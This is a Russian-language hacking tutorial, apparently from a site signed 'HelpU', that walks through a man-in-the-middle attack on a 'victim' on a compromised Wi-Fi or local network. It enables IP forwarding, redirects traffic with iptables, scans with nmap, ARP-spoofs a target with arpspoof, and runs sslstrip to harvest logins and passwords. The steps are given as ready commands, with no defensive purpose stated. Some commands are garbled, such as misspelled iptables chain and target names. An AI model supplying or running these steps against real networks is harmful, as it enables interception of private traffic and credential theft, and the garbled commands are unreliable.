MITM — прослушиваем трафик жертвы

 

В данной статье мы опишем один из примеров атаки под названием MITM. Man in the middle способен дать вам возможность слушать трафик вашей жертвы. А для этого надо всего лишь «встать» в сети между роутером и компьютером нашей жертвы. Это обычно делается после того, как вы взломали Wi-Fi или попали в локальную сеть. Поэтому надо знать базовые знания по взлому Wi-Fi-роутера, если вы ранее не изучали это, не стоит расстраиваться, на нашем сайте есть такая статья, стоит прочитать её прежде чем приступить к MITM

.Сразу же возникает вопрос: «Будем работать из под Linux или из под Windows?», — выбирайте то, что удобно для вас. Лично мы будем работать на Linux.Переходим к SSLStrip: Когда весь интернет был на обычном http, всё было проще, все POST запросы были в открытом виде и добыть логин и пароль жертвы не составляло большого труда. Сейчас же придумали «уникальные» сертификаты SSL, TLS. Из-за них шифруется весь трафик. Https некогда было большой проблемой. Но все решается и был придуман sslstrip, который и поможет нам в решении наших задач. Решить конечно мы сможем не все, есть некоторые ограничения. Потому как киты интернета грамотно строят защиту своих сайтов, а также модные браузеры ограничивают некоторые возможности, и sslstrip в таких случаях не подойдёт, но не стоит забывать, что всё можно обойти более хитрым способом.

Первоначальная настройка нашей системы:

В Linux есть файл под названием:

/proc/sys/net/ipv4/ip_forward

в нём по умолчанию стоит значение 0. Если обратиться к документам Debian, то он покажет нам, что этот параметр запрещает/разрешает передачу пакетов между интерфейсами. Грубо говоря, нам надо включить этот параметр, чтобы мы стали роутером и пересылали пакеты, как нам это надо.

Поэтому вбиваем в команду следующее:

 echo 1 > /proc/sys/net/ipv4/ip_forward

Отлично. При такой записи,

 ip_forward

будет работать у вас до перезагрузки. Если вы хотите изменить этот параметр навечно, то идем в

 /etc/sysctl.conf

и снимаем комментарий

 #net.ipv4.ip_forward=1

 Перейдем к настройке Ip Tables:

В вашу командную строку пишете:

ip tables -t nat -A PEROUTING -p tcp —destination-port 80 -j REDRECT —to-port 8080

-t nat

(тут мы создаем имя таблицы, в нашем случае nat)

-A

(добавляем новое правило в цепочку PREROUTING)

-p tcp--destination-port 80

(указываем порт назначения, ставим 80)

-j

(так мы описываем переход в другую цепочку REDIRECT)

--to-port 8080

(тут все понятно, указываем на какой порт перенаправляем)

Теперь надо узнать шлюз, который стоит по умолчанию и адрес нашей цели. Это легкий этап, и с ним не должно возникнуть каких-либо трудностей. Вводим:

 route -n

Теперь сканируем сеть, чтобы узнать адрес цели. Можно использовать любой сканер. В качестве примера, мы будем использовать nmap. В команду пишем следующее:

 nmap -sS -O 172.20.10.1/25

Подготовительный этап завершен. Теперь перейдем непосредственно к прослушиванию трафика.

Вводим команду:

 arpspoof -i eth0 -t 172.20.10.7 172.20.10.1

и нажимаем Enter. Окно не закрываем, так как нельзя останавливать процесс.

-i eth0

— имя интерфейса

-t 172.20.10.7

— это таргет, наша цель, адрес у вас будет другой

172.20.10.1

— это адрес шлюза

Если вы всё сделали верно, вас должно появиться следующее:

Открываем новый терминал и пишем в него:

 sslstrip -l 8080

Нажимаем Enter и ждем пока цель будет пользоваться интернетом.
Для удобства наблюдения можно в новом терминале набрать команду:

 tail -f sslstrip.log

Если всё сделали верно, вы получите то, что вы хотели получить.

Надеемся, данная статья была полезна для вас. Команда HelpU.